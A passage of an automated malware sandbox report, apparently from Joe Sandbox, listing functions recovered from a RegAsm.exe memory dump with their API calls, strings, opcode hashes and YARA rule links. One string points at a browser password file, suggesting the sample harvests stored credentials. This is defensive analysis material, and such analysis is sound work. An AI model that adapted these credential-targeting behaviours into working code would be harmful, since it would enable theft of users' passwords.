                                                                                • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040560C
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                • String ID: *.*$dat$wand.dat
                                                                                • API String ID: 2618321458-1828844352
                                                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00412057
                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                • String ID:
                                                                                • API String ID: 3550944819-0
                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                • memcpy.MSVCRT ref: 0040A94F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                                • String ID:
                                                                                • API String ID: 3023356884-0
                                                                                • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                • memcpy.MSVCRT ref: 0040B248
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$mallocwcslen
                                                                                • String ID:
                                                                                • API String ID: 3023356884-0
                                                                                • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: @
                                                                                • API String ID: 3510742995-2766056989
                                                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                • memcpy.MSVCRT ref: 0040B159
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$mallocstrlen
                                                                                • String ID:
                                                                                • API String ID: 1171893557-0
                                                                                • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004144E7
                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                • memset.MSVCRT ref: 0041451A
                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                • String ID:
                                                                                • API String ID: 1127616056-0
                                                                                • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                • malloc.MSVCRT ref: 00417459
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                                • String ID:
                                                                                • API String ID: 4284152360-0
                                                                                • Opcode ID: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                • Opcode Fuzzy Hash: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                • RegisterClassW.USER32(?), ref: 00412428
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                • String ID:
                                                                                • API String ID: 2678498856-0
                                                                                • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                • malloc.MSVCRT ref: 00417407
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$??3@malloc
                                                                                • String ID:
                                                                                • API String ID: 4284152360-0
                                                                                • Opcode ID: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                • Opcode Fuzzy Hash: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F673
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 2754987064-0
                                                                                • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 2754987064-0
                                                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$CloseHandle
                                                                                • String ID: General
                                                                                • API String ID: 3722638380-26480598
                                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                • String ID:
                                                                                • API String ID: 764393265-0
                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                • String ID:
                                                                                • API String ID: 979780441-0
                                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcpy.MSVCRT ref: 004134E0
                                                                                • memcpy.MSVCRT ref: 004134F2
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                • String ID:
                                                                                • API String ID: 1386444988-0
                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: wcschr$memcpywcslen
                                                                                • String ID: "
                                                                                • API String ID: 1983396471-123907689
                                                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfmemcpy
                                                                                • String ID: %2.2X
                                                                                • API String ID: 2789212964-323797159
                                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintf
                                                                                • String ID: %%-%d.%ds
                                                                                • API String ID: 3988819677-2008345750
                                                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040E770
                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendmemset
                                                                                • String ID: F^@
                                                                                • API String ID: 568519121-3652327722
                                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000F.00000002.447933144.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: PlacementWindowmemset
                                                                                • String ID: WinPos
                                                                                • API String ID: 4036792311-2823255486
                                                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
